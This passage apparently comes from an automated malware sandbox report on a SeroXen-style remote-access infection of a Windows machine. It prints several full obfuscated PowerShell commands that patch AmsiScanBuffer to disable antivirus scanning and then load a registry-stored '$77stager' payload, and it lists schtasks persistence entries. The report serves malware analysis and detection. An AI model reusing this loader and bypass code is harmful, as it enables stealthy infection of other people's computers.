$_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+'t'+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+'.'+'U'+''+[Char](110)+''+[Char](115)+'a'+'f'+''+[Char](101)+'N'+[Char](97)+'t'+[Char](105)+'v'+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$wXWVCLOwGUhVcH=$NjzmZAAkwDXxq.GetMethod('Get'+'P'+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+'i'+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gpKgblwCJZHQRJorNAm=XwSckbyoJfWJ @([String])([IntPtr]);$FVenBIChVWekdhLrpiJiFC=XwSckbyoJfWJ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XjFxxtTZuQA=$NjzmZAAkwDXxq.GetMethod('G'+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'uleHa'+[Char](110)+''+'d'+''+'l'+'e').Invoke($Null,@([Object]('ke'+'r'+''+'n'+'e'+[Char](108)+''+[Char](51)+'2.'+[Char](100)+''+'l'+''+[Char](108)+'')));$oJSZGHdkDsSpHq=$wXWVCLOwGUhVcH.Invoke($Null,@([Object]$XjFxxtTZuQA,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'dL'+[Char](105)+''+[Char](98)+''+[Char](114)+'ar'+[Char](121)+''+[Char](65)+'')));$vHrpfSMndukxLikXD=$wXWVCLOwGUhVcH.Invoke($Null,@([Object]$XjFxxtTZuQA,[Object](''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$nQjXFIE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oJSZGHdkDsSpHq,$gpKgblwCJZHQRJorNAm).Invoke('a'+'m'+''+'s'+'i'+'.'+'d'+'l'+'l');$bfWoVldWPYICLbpdL=$wXWVCLOwGUhVcH.Invoke($Null,@([Object]$nQjXFIE,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+''+'f'+''+'e'+'r')));$hNqJMDyAUC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vHrpfSMndukxLikXD,$FVenBIChVWekdhLrpiJiFC).Invoke($bfWoVldWPYICLbpdL,[uint32]8,4,[ref]$hNqJMDyAUC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bfWoVldWPYICLbpdL,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vHrpfSMndukxLikXD,$FVenBIChVWekdhLrpiJiFC).Invoke($bfWoVldWPYICLbpdL,[uint32]8,0x20,[ref]$hNqJMDyAUC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+'7'+'s'+''+'t'+'ag'+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2572
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:paWRZWnyYWQf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mLEtHzMGvFDUcE,[Parameter(Position=1)][Type]$vyZSduXuOv)$WlurpAcHJoO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'M'+[Char](101)+''+'m'+''+[Char](111)+'r'+[Char](121)+'Mo'+[Char](100)+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'ic'+[Char](44)+''+'S'+''+'e'+'a'+[Char](108)+'ed'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'iC'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+'t'+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$WlurpAcHJoO.DefineConstructor('R'+'T'+''+'S'+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+'l'+''+'N'+'a'+'m'+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eBy'+'S'+'i'+[Char](103)+''+','+'P'+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$mLEtHzMGvFDUcE).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+'t'+''+[Char](105)+'m'+'e'+''+[Char](44)+'M'+[Char](97)+''+'n'+''+[Char](97)+'ge'+'d'+'');$WlurpAcHJoO.DefineMethod(''+'I'+''+[Char](110)+'v'+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+'b'+''+[Char](108)+'i'+[Char](99)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+',N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$vyZSduXuOv,$mLEtHzMGvFDUcE).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $WlurpAcHJoO.CreateType();}$HsibBDQjNmdgZ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+'s'+''+'o'+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+''+'n'+''+[Char](115)+''+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+''+'v'+''+[Char](101)+'Me'+[Char](116)+''+'h'+'od'+[Char](115)+'');$GXMpjTojLLWlZg=$HsibBDQjNmdgZ.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+'r'+''+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$wSTiMVKyYvuAaIvKCcb=paWRZWnyYWQf @([String])([IntPtr]);$lMGRbQEqdeUYQlRPqVCbEq=paWRZWnyYWQf @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$sadfHHLPdWa=$HsibBDQjNmdgZ.GetMethod('G'+'e'+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+'n'+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+'n'+'e'+'l'+''+[Char](51)+'2'+[Char](46)+''+'d'+'ll')));$ZZqMSwagQLbIwo=$GXMpjTojLLWlZg.Invoke($Null,@([Object]$sadfHHLPdWa,[Object](''+[Char](76)+''+[Char](111)+''+'a'+'d'+'L'+''+[Char](105)+'b'+'r'+''+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$BvqkJcyrmMzWbbPqU=$GXMpjTojLLWlZg.Invoke($Null,@([Object]$sadfHHLPdWa,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+'al'+'P'+''+[Char](114)+''+'o'+''+'t'+''+[Char](101)+''+[Char](99)+''+'t'+'')));$XicCpLf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZZqMSwagQLbIwo,$wSTiMVKyYvuAaIvKCcb).Invoke('a'+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'');$vKfJOWkKMAOSPilNu=$GXMpjTojLLWlZg.Invoke($Null,@([Object]$XicCpLf,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+'c'+''+[Char](97)+'n'+[Char](66)+''+'u'+'f'+[Char](102)+''+[Char](101)+''+'r'+'')));$gItzdDLMWy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BvqkJcyrmMzWbbPqU,$lMGRbQEqdeUYQlRPqVCbEq).Invoke($vKfJOWkKMAOSPilNu,[uint32]8,4,[ref]$gItzdDLMWy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$vKfJOWkKMAOSPilNu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BvqkJcyrmMzWbbPqU,$lMGRbQEqdeUYQlRPqVCbEq).Invoke($vKfJOWkKMAOSPilNu,[uint32]8,0x20,[ref]$gItzdDLMWy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FTWA'+[Char](82)+''+'E'+'').GetValue('$77'+'s'+''+[Char](116)+''+[Char](97)+''+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:908
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:pTyMYVhjyUpr{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aGmSFSUQvZkdMC,[Parameter(Position=1)][Type]$otyEQUFSjn)$VxZnuiOOiWn=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+'le'+[Char](99)+''+'t'+''+'e'+'d'+[Char](68)+''+'e'+'l'+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+'M'+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'D'+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e'+'T'+'y'+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'led'+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+'t'+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$VxZnuiOOiWn.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+'a'+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'eB'+[Char](121)+''+[Char](83)+'i'+[Char](103)+','+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$aGmSFSUQvZkdMC).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e,Ma'+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$VxZnuiOOiWn.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+'e'+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+','+'V'+[Char](105)+''+'r'+''+'t'+'u'+[Char](97)+'l',$otyEQUFSjn,$aGmSFSUQvZkdMC).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'me'+','+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');Write-Output $VxZnuiOOiWn.CreateType();}$PuHZBmMarkXcQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+'t'+''+[Char](101)+'m'+[Char](46)+''+'d'+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+'sa'+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+'v'+[Char](101)+''+[Char](77)+''+'e'+'t'+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$rJDOzOsTBDlRxa=$PuHZBmMarkXcQ.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+'c'+'Ad'+'d'+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+',S'+[Char](116)+'at'+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$bTdBeeyoexzRkWTTAER=pTyMYVhjyUpr @([String])([IntPtr]);$KIrLQDQFWFoboRGBdkmIrN=pTyMYVhjyUpr @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pAZwYVqiQXC=$PuHZBmMarkXcQ.GetMethod('G'+[Char](101)+'t'+[Char](77)+''+'o'+''+[Char](100)+'ul'+'e'+'Ha'+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+'n'+''+'e'+''+[Char](108)+''+[Char](51)+'2'+'.'+''+[Char](100)+''+[Char](108)+'l')));$QDwIWoOyLkcsQq=$rJDOzOsTBDlRxa.Invoke($Null,@([Object]$pAZwYVqiQXC,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+'i'+''+'b'+'r'+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$mryRhSLKEWmxoMTRw=$rJDOzOsTBDlRxa.Invoke($Null,@([Object]$pAZwYVqiQXC,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));$VcRdwYj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QDwIWoOyLkcsQq,$bTdBeeyoexzRkWTTAER).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+'.'+'dl'+[Char](108)+'');$RgmLSyZqTgScfQSbe=$rJDOzOsTBDlRxa.Invoke($Null,@([Object]$VcRdwYj,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+'er')));$ZkIkogeJaN=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mryRhSLKEWmxoMTRw,$KIrLQDQFWFoboRGBdkmIrN).Invoke($RgmLSyZqTgScfQSbe,[uint32]8,4,[ref]$ZkIkogeJaN);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RgmLSyZqTgScfQSbe,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mryRhSLKEWmxoMTRw,$KIrLQDQFWFoboRGBdkmIrN).Invoke($RgmLSyZqTgScfQSbe,[uint32]8,0x20,[ref]$ZkIkogeJaN);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+'WA'+[Char](82)+''+'E'+'').GetValue('$'+[Char](55)+'7'+'s'+''+[Char](116)+''+[Char](97)+''+'g'+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  PID:3804
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1172

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1228

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1368
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:3060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1504

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1716

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
- Modifies Internet Explorer settings
PID:1824
- C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x00000000000004B8 0x00000000000004CC
  2⤵
  PID:3732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1904

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2028

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1864

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
- Drops file in System32 directory
PID:2416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2508

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2516

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2532

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2272

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2164

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3292
- C:\Users\Admin\AppData\Local\Temp\Uni.exe
  "C:\Users\Admin\AppData\Local\Temp\Uni.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3584
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:4424
- - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
    "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4132
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Creates scheduled task(s)
      PID:2132
  - - C:\Users\Admin\AppData\Local\Temp\install.exe
      "C:\Users\Admin\AppData\Local\Temp\install.exe"
      4⤵
      Executes dropped EXE
      PID:2812
  - - C:\Users\Admin\AppData\Local\Temp\tUCkOmZwRnsY.exe
      "C:\Users\Admin\AppData\Local\Temp\tUCkOmZwRnsY.exe"
      4⤵
      Executes dropped EXE
      PID:656
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /delete /tn "SeroXen" /f
      4⤵
      PID:4800
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4552
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QGt1lQ2ztLkj.bat" "
      4⤵
      PID:4672
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4152
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        
        PID:1352
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        5⤵
        Runs ping.exe
        
        PID:2104
  - - C:\Users\Admin\AppData\Local\Temp\install.exe
      "C:\Users\Admin\AppData\Local\Temp\install.exe"
      4⤵
      Executes dropped EXE
      PID:2156
  - - C:\Windows\SysWOW64\SCHTASKS.exe
      "SCHTASKS.exe" /create /tn "$77Client.exe" /tr "'C:\Users\Admin\AppData\Roaming\SubDir\Client.exe'" /sc onlogon /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:5104
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2088
- - C:\Users\Admin\AppData\Local\Temp\install.exe
    "C:\Users\Admin\AppData\Local\Temp\install.exe"
    3⤵
    - Executes dropped EXE
    PID:4416
- - C:\Windows\SysWOW64\SCHTASKS.exe
    "SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:2036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2336
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x12c,0x130,0x134,0x108,0x138,0x7ffee7773cb8,0x7ffee7773cc8,0x7ffee7773cd8
    3⤵
    PID:3340
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,8918080595204330043,5303618292816187512,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1948 /prefetch:2
    3⤵
    PID:1028
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
